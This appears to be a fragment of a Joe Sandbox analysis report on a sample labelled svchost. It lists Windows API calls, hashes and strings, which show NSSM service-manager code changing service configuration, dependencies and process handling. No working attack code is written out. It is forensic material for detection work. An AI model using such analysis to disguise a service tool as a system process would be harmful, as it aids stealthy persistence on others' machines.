                                                    • Instruction ID: 6df11741ffc9c133aa2f1d23af60f207f574fc6f7eed3b9c725f422df81f401a
                                                    • Opcode Fuzzy Hash: 93abe4eb89c4456a5bac7811860cf9eb8417963c086c90116b55cb21d40498a7
                                                    • Instruction Fuzzy Hash: C9E08CB5009202BAD200DF40ED48EDBB7ACEF88B50F004948F26492160E330880487BB
                                                    APIs
                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,00000000), ref: 0040AFAD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID:
                                                    • API String ID: 3660427363-0
                                                    • Opcode ID: 538a7e2e593c2b1df26199a27f16ff88f02e39c7db606f20f98d7ca63f0cf366
                                                    • Instruction ID: 597d436d122071fde7b142eaa2d3e4324275d01078404c93b01c3c5b25e8dfd8
                                                    • Opcode Fuzzy Hash: 538a7e2e593c2b1df26199a27f16ff88f02e39c7db606f20f98d7ca63f0cf366
                                                    • Instruction Fuzzy Hash: 8F01B5F7D043116BD710EA68EC45BCB7B98ABD4725F44853AF589E3281E238C948C7A3
                                                    APIs
                                                    • GetProcessTimes.KERNELBASE(?,?,?,?,?), ref: 00409F6C
                                                    • GetLastError.KERNEL32(00000000), ref: 00409F77
                                                      • Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000014,?,00401042,00000000,00000000), ref: 004052C7
                                                      • Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$AllocDeregisterErrorLastLocalProcessRegisterReportTimesValue
                                                    • String ID:
                                                    • API String ID: 2954018415-0
                                                    • Opcode ID: 05161e89971d5f04a25216144698213b570e3291b45edcb44d12a17e94977250
                                                    • Instruction ID: bc366b3cbda322b824c9a217db56cc4eac1f60e122c8c735dcd73177c2023d54
                                                    • Opcode Fuzzy Hash: 05161e89971d5f04a25216144698213b570e3291b45edcb44d12a17e94977250
                                                    • Instruction Fuzzy Hash: 55F096F6904300BBE700E7A1DC45EEB73ACABC830CF84892DF559D2142F579D64487A6
                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00418B21
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CreateHeap
                                                    • String ID:
                                                    • API String ID: 10892065-0
                                                    • Opcode ID: d1f5c1f7ff6ca3e210c9ff08d4e84c7b89227a1fab85292e36c71b5e85367a71
                                                    • Instruction ID: 6fb3f13a5da9b15824ab22e1f0bcca622450086d227712405257e67a9503346b
                                                    • Opcode Fuzzy Hash: d1f5c1f7ff6ca3e210c9ff08d4e84c7b89227a1fab85292e36c71b5e85367a71
                                                    • Instruction Fuzzy Hash: 09D05E72B94304AADB109F75BD08B623BECD784396F00843AB90CC6150E678DA81DA08
                                                    APIs
                                                    • OpenServiceW.ADVAPI32(?,?,?,?,00000000,00000000,77735E70), ref: 0040CAEF
                                                    • GetServiceDisplayNameW.ADVAPI32 ref: 0040CB17
                                                    • GetServiceKeyNameW.ADVAPI32(?,?,?,?), ref: 0040CB34
                                                    • GetLastError.KERNEL32 ref: 0040CB47
                                                    • GetLastError.KERNEL32 ref: 0040CB50
                                                    • EnumServicesStatusW.ADVAPI32 ref: 0040CB9D
                                                    • GetLastError.KERNEL32 ref: 0040CBA3
                                                    • GetProcessHeap.KERNEL32(00000000,0000003B), ref: 0040CBB7
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040CBBE
                                                    • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,00000003,?,0000003B,?), ref: 0040CC1A
                                                    • GetLastError.KERNEL32 ref: 0040CC2A
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040CC75
                                                    • HeapFree.KERNEL32(00000000), ref: 0040CC7C
                                                    • GetLastError.KERNEL32 ref: 0040CC82
                                                    • __snwprintf_s.LIBCMT ref: 0040CCB4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CCC3
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040CCCA
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CCDF
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040CCE6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$ErrorLast$Process$FreeService$EnumNameServicesStatus$AllocDisplayOpen__snwprintf_s
                                                    • String ID: ENUM_SERVICE_STATUS$canonical_name$open_service()
                                                    • API String ID: 2597093351-3687008758
                                                    • Opcode ID: a873ba07c5b4005c15c99fbe001417df42881820b5864b2ce8b4ed45134739af
                                                    • Instruction ID: f503188999ee140625c6406a49f341195e14fe3366045b110030180a16826972
                                                    • Opcode Fuzzy Hash: a873ba07c5b4005c15c99fbe001417df42881820b5864b2ce8b4ed45134739af
                                                    • Instruction Fuzzy Hash: 51618AB1904301EBD710DB55DC85FAFB7E8EBD8704F104A2EF959A3280D778E9058B6A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90058403c9df6f6ed3b87d35343112d852bc14fd61586e00f88080c2bcc3e524
                                                    • Instruction ID: f9580fb1e3cb4435e98f8377f0ae24c04a26ce3602f05662924e3990e25ac85f
                                                    • Opcode Fuzzy Hash: 90058403c9df6f6ed3b87d35343112d852bc14fd61586e00f88080c2bcc3e524
                                                    • Instruction Fuzzy Hash: 6F21F7F2A406087BE6207765BC4AFDB375CDB88319F00403AF609E5182E779E8454A68
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00416877
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041688C
                                                    • UnhandledExceptionFilter.KERNEL32(0041F0D8), ref: 00416897
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 004168B3
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004168BA
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: f01314061c3818e20305920116d866878eb5042cc5ccecfbecbbfc2216c79b6f
                                                    • Instruction ID: 714c231b98a53905c4c0fced0f636a606c023e921e8ea544abea05735bda33fc
                                                    • Opcode Fuzzy Hash: f01314061c3818e20305920116d866878eb5042cc5ccecfbecbbfc2216c79b6f
                                                    • Instruction Fuzzy Hash: B921C5F5A01304AFCB31DF54E9456847BB8FB98302F90817AE51987360E7B89A868F4D
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\ServiceGroupOrder,00000000,00020019,?), ref: 0040CEED
                                                    • GetLastError.KERNEL32 ref: 0040CEF7
                                                    • _fwprintf.LIBCMT ref: 0040CF1A
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    • ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,0041E5D8,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0040D225
                                                    • GetProcessHeap.KERNEL32(00000000,0041E5D8), ref: 0040D239
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D240
                                                    • GetLastError.KERNEL32 ref: 0040D246
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040D27A
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D283
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D290
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D293
                                                    • CloseServiceHandle.ADVAPI32(?), ref: 0040D29A
                                                    • _fwprintf.LIBCMT ref: 0040D2BD
                                                      • Part of subcall function 0040CA70: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,?,00401B82,?,?,?,00000001), ref: 0040CA7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$ErrorLastOpenService_fwprintf$ChangeCloseConfigHandleLocalManager_vfwprintf
                                                    • String ID: %s: %s$%s: %s$%s\%s: %s$List$SYSTEM\CurrentControlSet\Control\ServiceGroupOrder$groups$set_service_dependencies()
                                                    • API String ID: 1051873479-3133791794
                                                    • Opcode ID: 1472673ddb642fb760451205b66f8a7f14b720a8d27ed31555cebdbe2feeab61
                                                    • Instruction ID: 9c0a7fc0b1366e98588ba43337f49fd2028f4eb401c9540c82854c5db0497d9e
                                                    • Opcode Fuzzy Hash: 1472673ddb642fb760451205b66f8a7f14b720a8d27ed31555cebdbe2feeab61
                                                    • Instruction Fuzzy Hash: 41C1D8F1D04301ABD710ABA1DC4AFAB77A8EF44708F14452AF945A72C1F778E94487AE
                                                    APIs
                                                    • __wcsnicmp.LIBCMT ref: 0040111B
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00401150
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401153
                                                    • GetComputerNameW.KERNEL32 ref: 00401185
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004011B4
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004011B7
                                                    • LsaClose.ADVAPI32(?), ref: 004011F0
                                                    • LsaLookupNames.ADVAPI32(?,00000001,?,?,?), ref: 0040126B
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00401275
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00401278
                                                    • LsaClose.ADVAPI32(?), ref: 0040128B
                                                    • LsaFreeMemory.ADVAPI32(?), ref: 00401299
                                                    • LsaFreeMemory.ADVAPI32(?), ref: 004012A3
                                                    • LsaNtStatusToWinError.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 004012A9
                                                      • Part of subcall function 00401000: LsaOpenPolicy.ADVAPI32(00000000,000F0FFF,000F0FFF,?), ref: 0040102D
                                                      • Part of subcall function 00401000: LsaNtStatusToWinError.ADVAPI32(00000000), ref: 00401037
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$AllocCloseErrorMemoryStatus$ComputerLookupNameNamesOpenPolicy__wcsnicmp
                                                    • String ID: %s\%s$SID$expanded$username_sid
                                                    • API String ID: 1950436716-179756375
                                                    • Opcode ID: 0f01d14120d1ec3f52388d2865ee54dcbcf4cc9dc7fddb09f4af5f8e8ba633f5
                                                    • Instruction ID: 8923221f29891c7587102ab13130cbc3c72cae1e0e7c2496b089627ed1adcca3
                                                    • Opcode Fuzzy Hash: 0f01d14120d1ec3f52388d2865ee54dcbcf4cc9dc7fddb09f4af5f8e8ba633f5
                                                    • Instruction Fuzzy Hash: 06D1D3B1A043016FD300EB65CD85EAFB3E9EF88308F44492EF545D7351EA78E9458B9A
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008), ref: 0041135B
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041135E
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0041139B
                                                    • HeapFree.KERNEL32(00000000), ref: 0041139E
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004113AB
                                                    • HeapFree.KERNEL32(00000000), ref: 004113AE
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411430
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411433
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411470
                                                    • HeapFree.KERNEL32(00000000), ref: 00411473
                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 004114E9
                                                    • HeapFree.KERNEL32(00000000), ref: 004114EC
                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 004114F9
                                                    • HeapFree.KERNEL32(00000000), ref: 004114FC
                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 00411509
                                                    • HeapFree.KERNEL32(00000000), ref: 0041150C
                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 00411519
                                                    • HeapFree.KERNEL32(00000000), ref: 0041151C
                                                    • ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041153C
                                                    • GetLastError.KERNEL32 ref: 00411546
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411576
                                                    • HeapFree.KERNEL32(00000000), ref: 0041157D
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411596
                                                    • HeapFree.KERNEL32(00000000), ref: 0041159D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Alloc$ChangeConfigErrorLastService
                                                    • String ID: canon$dependencies$native_set_dependongroup
                                                    • API String ID: 1452945198-1240925597
                                                    • Opcode ID: 2bfb86973befa482fabe00d42bb3fe4171c406064511875981c350d78f657692
                                                    • Instruction ID: b18a58e69c4f32cef05835414142f752b3cd4a08407a03f402dfde9a93b034f2
                                                    • Opcode Fuzzy Hash: 2bfb86973befa482fabe00d42bb3fe4171c406064511875981c350d78f657692
                                                    • Instruction Fuzzy Hash: 829129B19043066BD710AF65CC84EEB73D8EF84354F444A2AFA55D3290E778ED84C7A9
                                                    APIs
                                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 00408D89
                                                    • IsTextUnicode.ADVAPI32(?,?,00000000), ref: 00408E39
                                                    • CloseHandle.KERNEL32(?), ref: 00408EA4
                                                    • MoveFileW.KERNEL32(?,?), ref: 00408EB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileHandle$CloseInformationMoveTextUnicode
                                                    • String ID: MoveFile()
                                                    • API String ID: 2866973295-3582319293
                                                    • Opcode ID: 15708711689a8bb3d828d14e4bfab1ca7b6999520053ae95ba287ec52d9b1868
                                                    • Instruction ID: d8a2b6048f09d48243753343ed7bb43d63bee3e823a3270b0cadf41497ef1fc2
                                                    • Opcode Fuzzy Hash: 15708711689a8bb3d828d14e4bfab1ca7b6999520053ae95ba287ec52d9b1868
                                                    • Instruction Fuzzy Hash: CEB185B1604301AFD320DF65CD85E6BB7E9EFC8308F00492EF58693291DA74E945CB6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWindow
                                                    • String ID: %s$%s: %s$%s: %s: %s
                                                    • API String ID: 2863861424-3854535108
                                                    • Opcode ID: 62dbc4f8497a765d2b6207e4a47a89f7e005d1b09c3d01c80ec779e24176e9d2
                                                    • Instruction ID: 763075a4a37bd2d8825689e23daf19d261bde39fceb0a92dd0ece0a9df8372dc
                                                    • Opcode Fuzzy Hash: 62dbc4f8497a765d2b6207e4a47a89f7e005d1b09c3d01c80ec779e24176e9d2
                                                    • Instruction Fuzzy Hash: A981DBF6D04200BBE22077719C46BAF725C9B9431DF44093FF906A62C2FA7CD95946AB
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040A5C0
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • __snwprintf_s.LIBCMT ref: 0040A5DE
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • OpenProcess.KERNEL32(00100411,00000000,?), ref: 0040A610
                                                    • __snwprintf_s.LIBCMT ref: 0040A639
                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0040A67A
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A699
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A6C2
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A6ED
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A6F7
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A723
                                                    • GetLastError.KERNEL32(00000000,00000002,00000000), ref: 0040A72F
                                                    • _memset.LIBCMT ref: 0040A760
                                                    • Process32FirstW.KERNEL32 ref: 0040A776
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A780
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0040A7C2
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0040A807
                                                    • GetLastError.KERNEL32(?,00000000,?,?,00000002,00000000), ref: 0040A816
                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,?,00000002,00000000), ref: 0040A81F
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000002,00000000), ref: 0040A83C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CloseEventHandleProcess32__snwprintf_s$NextProcessSource$CodeCreateDeregisterExitFirstOpenRegisterReportSnapshotToolhelp32__vsnwprintf_s_l_memset
                                                    • String ID: %lu$AppStopMethodSkip$NSSM
                                                    • API String ID: 876000941-153837258
                                                    • Opcode ID: 87d6cd8ad363924e11445b902c5b866b416526b6275c1319dbaef4f3e386f7b6
                                                    • Instruction ID: 9356f86b261df9c84ccaf74e0b1af484dc6ccdd0321f5befb0d5a42ea0511750
                                                    • Opcode Fuzzy Hash: 87d6cd8ad363924e11445b902c5b866b416526b6275c1319dbaef4f3e386f7b6
                                                    • Instruction Fuzzy Hash: A061C8F15043007BE220A7519D8AFFB736CDF94708F50892EFA49A21C3F6B89515867B
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 0041171B
                                                    • HeapFree.KERNEL32(00000000,?,?,?), ref: 00411722
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 00411750
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00411790
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411793
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004117A0
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004117A3
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00411753
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411813
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411816
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411823
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411826
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411833
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411836
                                                    • ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041185A
                                                    • GetLastError.KERNEL32 ref: 00411864
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411895
                                                    • HeapFree.KERNEL32(00000000), ref: 0041189C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004118B5
                                                    • HeapFree.KERNEL32(00000000), ref: 004118BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$AllocChangeConfigErrorLastLocalService_vfwprintf
                                                    • String ID: dependencies$native_set_dependonservice
                                                    • API String ID: 2900453341-2849880886
                                                    • Opcode ID: eacf11b33cb2cc2d23edf79ce080d1b0cbbaad9b579bfd244ff4f5032ff0d319
                                                    • Instruction ID: c8f04e43e909d1bf12b9aa294be1e3cdf98767991595af7166a1449a2d8a3fce
                                                    • Opcode Fuzzy Hash: eacf11b33cb2cc2d23edf79ce080d1b0cbbaad9b579bfd244ff4f5032ff0d319
                                                    • Instruction Fuzzy Hash: 0E51D5B1A043016BE610EB65DC45FAB73DCEF84714F048629FA68D72E1EB78DC44C66A
                                                    APIs
                                                    • _memset.LIBCMT ref: 00406A39
                                                    • GetProcessHeap.KERNEL32 ref: 00406A56
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00406A59
                                                    • _memset.LIBCMT ref: 00406A74
                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000200), ref: 00406AD9
                                                    • __snwprintf_s.LIBCMT ref: 00406AFC
                                                    • __snwprintf_s.LIBCMT ref: 00406AB8
